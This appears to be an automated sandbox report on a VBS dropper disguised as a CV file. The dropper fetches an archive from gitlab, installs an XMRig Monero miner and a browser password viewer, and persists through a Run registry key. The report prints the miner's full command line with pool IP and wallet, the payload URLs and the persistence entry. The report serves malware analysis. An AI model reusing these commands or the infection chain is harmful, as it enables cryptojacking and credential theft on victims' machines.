11.3.7g.exe.35b7600.1.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x3f0fb0:$s1: %s/%s (Windows NT %lu.%lu 0x3f2060:$s3: \\.\WinRing0_ 0x3ebe30:$s4: pool_wallet 0x3e7c88:$s5: cryptonight 0x3e7c98:$s5: cryptonight 0x3e7ca8:$s5: cryptonight 0x3e7cb8:$s5: cryptonight 0x3e7cd0:$s5: cryptonight 0x3e7ce0:$s5: cryptonight 0x3e7cf0:$s5: cryptonight 0x3e7d08:$s5: cryptonight 0x3e7d18:$s5: cryptonight 0x3e7d30:$s5: cryptonight 0x3e7d48:$s5: cryptonight 0x3e7d58:$s5: cryptonight 0x3e7d68:$s5: cryptonight 0x3e7d78:$s5: cryptonight 0x3e7d90:$s5: cryptonight 0x3e7da8:$s5: cryptonight 0x3e7db8:$s5: cryptonight 0x3e7dc8:$s5: cryptonight
11.3.7g.exe.3580000.2.raw.unpack	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth (Nextron Systems)	0x427fc0:$s1: 'h' hashrate, 'p' pause, 'r' resume 0x422176:$s2: --cpu-affinity 0x422190:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0x421a68:$s4: password for mining server
11.3.7g.exe.3580000.2.raw.unpack	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x422235:$s01: --cpu-priority= 0x421b8d:$s05: --nicehash
11.3.7g.exe.3580000.2.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth (Nextron Systems)	0x427ab8:$x1: donate.ssl.xmrig.com 0x427fb1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
11.3.7g.exe.3580000.2.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
11.3.7g.exe.3580000.2.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
11.3.7g.exe.3580000.2.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4285b0:$s1: %s/%s (Windows NT %lu.%lu 0x429660:$s3: \\.\WinRing0_ 0x423430:$s4: pool_wallet 0x41f288:$s5: cryptonight 0x41f298:$s5: cryptonight 0x41f2a8:$s5: cryptonight 0x41f2b8:$s5: cryptonight 0x41f2d0:$s5: cryptonight 0x41f2e0:$s5: cryptonight 0x41f2f0:$s5: cryptonight 0x41f308:$s5: cryptonight 0x41f318:$s5: cryptonight 0x41f330:$s5: cryptonight 0x41f348:$s5: cryptonight 0x41f358:$s5: cryptonight 0x41f368:$s5: cryptonight 0x41f378:$s5: cryptonight 0x41f390:$s5: cryptonight 0x41f3a8:$s5: cryptonight 0x41f3b8:$s5: cryptonight 0x41f3c8:$s5: cryptonight
19.0.mservice.exe.7ff7a0a50000.0.unpack	XMRIG_Monero_Miner	Detects Monero mining software	Florian Roth (Nextron Systems)	0x427fc0:$s1: 'h' hashrate, 'p' pause, 'r' resume 0x422176:$s2: --cpu-affinity 0x422190:$s3: set process affinity to CPU core(s), mask 0x3 for cores 0 and 1 0x421a68:$s4: password for mining server
19.0.mservice.exe.7ff7a0a50000.0.unpack	PUA_Crypto_Mining_CommandLine_Indicators_Oct21	Detects command line parameters often used by crypto mining software	Florian Roth (Nextron Systems)	0x422235:$s01: --cpu-priority= 0x421b8d:$s05: --nicehash
19.0.mservice.exe.7ff7a0a50000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth (Nextron Systems)	0x427ab8:$x1: donate.ssl.xmrig.com 0x427fb1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
19.0.mservice.exe.7ff7a0a50000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
19.0.mservice.exe.7ff7a0a50000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4285b0:$s1: %s/%s (Windows NT %lu.%lu 0x429660:$s3: \\.\WinRing0_ 0x423430:$s4: pool_wallet 0x41f288:$s5: cryptonight 0x41f298:$s5: cryptonight 0x41f2a8:$s5: cryptonight 0x41f2b8:$s5: cryptonight 0x41f2d0:$s5: cryptonight 0x41f2e0:$s5: cryptonight 0x41f2f0:$s5: cryptonight 0x41f308:$s5: cryptonight 0x41f318:$s5: cryptonight 0x41f330:$s5: cryptonight 0x41f348:$s5: cryptonight 0x41f358:$s5: cryptonight 0x41f368:$s5: cryptonight 0x41f378:$s5: cryptonight 0x41f390:$s5: cryptonight 0x41f3a8:$s5: cryptonight 0x41f3b8:$s5: cryptonight 0x41f3c8:$s5: cryptonight
Click to see the 14 entries

Sigma Signatures

Bitcoin Miner

Sigma detected: Xmrig

Source: Process started

Author: Joe Security: Data: Command: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title, CommandLine: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title, CommandLine|base64offset|contains: , Image: C:\Users\Public\WindowsUpdate\mservice.exe, NewProcessName: C:\Users\Public\WindowsUpdate\mservice.exe, OriginalFileName: C:\Users\Public\WindowsUpdate\mservice.exe, ParentCommandLine: wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4860, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title, ProcessId: 3476, ProcessName: mservice.exe

Persistence and Installation Behavior

Sigma detected: Register Wscript In Run Key

Source: Registry Key set

Author: Joe Security: Data: Details: wscript.exe "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 6984, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Media Service

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\Public\WindowsUpdate\mservice.exe

Avira: detection malicious, Label: HEUR/AGEN.1311290

Multi AV Scanner detection for submitted file

Source: curriculum_vitae-copie.vbs

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\WindowsUpdate\mservice.exe	ReversingLabs: Detection: 83%
Source: C:\Users\Public\WindowsUpdate\ps.exe	ReversingLabs: Detection: 80%

Machine Learning detection for dropped file

Source: C:\Users\Public\WindowsUpdate\ps.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\WindowsUpdate\mservice.exe	Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7g.exe PID: 5428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mservice.exe PID: 3476, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED

Found strings related to Crypto-Mining

Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server

Source: unknown	HTTPS traffic detected: 49.12.202.237:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49713 version: TLS 1.2

Source:	Binary string: .pdbo` source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, go.exe.11.dr
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr

Source: C:\Users\Public\7g.exe

Code function: 11_2_003B716C __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Adobe\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\

Source: C:\Users\Public\7g.exe

Code function: 11_2_003B6553 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 49.12.202.237 443
Source: C:\Windows\System32\wscript.exe	Domain query: www.7-zip.org
Source: C:\Windows\System32\wscript.exe	Domain query: gitlab.com
Source: C:\Windows\System32\wscript.exe	Network Connect: 172.65.251.78 443

Potential malicious VBS script found (has network functionality)

Source:	Initial file: .write L5caQRBcFL5.responseBody
Source:	Initial file: .savetofile L5M2srg9CbnIL5, 2
Source: C:\Users\Public\7g.exe	Dropped file: .write L5xL5.responseBody	Jump to dropped file
Source: C:\Users\Public\7g.exe	Dropped file: .savetofile L5sL5, 2 '//overwrite	Jump to dropped file

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /a/7zr.exe HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.7-zip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cv4345521/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 172.65.251.78 172.65.251.78

Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, WinRing0x64.sys.11.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: wscript.exe, 00000005.00000003.811414806.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858655277.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216311D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 7g.exe, 0000000B.00000003.816824886.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, ps.exe.11.dr	String found in binary or memory: http://www.nirsoft.net/
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://content-cloudbilling.googleapis.com
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://content-cloudresourcemanager.googleapis.com
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://content-compute.googleapis.com
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://content.googleapis.com
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://customers.gitlab.com
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com
Source: wscript.exe, 00000005.00000003.811414806.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858655277.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216311D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/-/sandbox/
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/-/speedscope/index.html
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/admin/
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/assets/
Source: wscript.exe, 00000005.00000003.475087374.0000022162DC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163163000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie.vbs	String found in binary or memory: https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=false
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falseA
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsem
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cv4345521/cv/-/raw/main/gmail.7z?inline=falsex
Source: wscript.exe, 00000019.00000002.899281249.000001FFE25D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899123544.000001FFE0938000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899241012.000001FFE0BB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898695255.000001FFE094D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898409186.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899199737.000001FFE094E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp, sarmat.vbs.11.dr	String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=false
Source: wscript.exe, 00000015.00000002.992417001.0000016591D38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898409186.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falseMsg
Source: wscript.exe, 00000017.00000002.881382988.000001E320C05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000019.00000002.899241012.000001FFE0BB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cv6535510/cv/-/raw/main/curriculum_vitae-usb.vbs?inline=falsee
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gitlab.com/cwIf
Source: wscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://new-sentry.gitlab.net
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sentry.gitlab.net
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sentry.gitlab.net/api/105/security/?sentry_key=a42ea3adc19140d9a6424906e12fba86;
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://snowplow.tgitlab.c%
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://snowplow.tgitlab.c%%.
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://snowplow.trx.gitlab.net
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sourcegraph.com
Source: wscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.7-zip.org/O
Source: wscript.exe, 00000005.00000003.475087374.0000022162DC5000.00000004.00000020.00020000.00000000.sdmp, curriculum_vitae-copie.vbs	String found in binary or memory: https://www.7-zip.org/a/7zr.exe
Source: wscript.exe, 00000005.00000003.858386999.0000022162F60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860549226.0000022162F61000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.856009779.0000022162F60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.7-zip.org/a/7zr.exel
Source: wscript.exe, 00000005.00000003.858655277.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216310C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216310C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.7-zip.org/w
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: wscript.exe, 00000005.00000003.811836031.0000022165974000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com/ns.html
Source: wscript.exe, 00000005.00000003.811414806.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.857991730.0000022163565000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.0000022163163000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858632166.000002216318E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: wscript.exe, 00000005.00000002.860768150.0000022163193000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.recaptcha.net/
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr	String found in binary or memory: https://xmrig.com/wizard
Source: 7g.exe, 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, mservice.exe, 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, mservice.exe.11.dr	String found in binary or memory: https://xmrig.com/wizard%s

Source: unknown

DNS traffic detected: queries for: www.7-zip.org

Source: global traffic	HTTP traffic detected: GET /a/7zr.exe HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.7-zip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cv4345521/cv/-/raw/main/gmail.7z?inline=false HTTP/1.1Accept: /Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
Source: unknown	TCP traffic detected without corresponding DNS query: 141.94.96.144
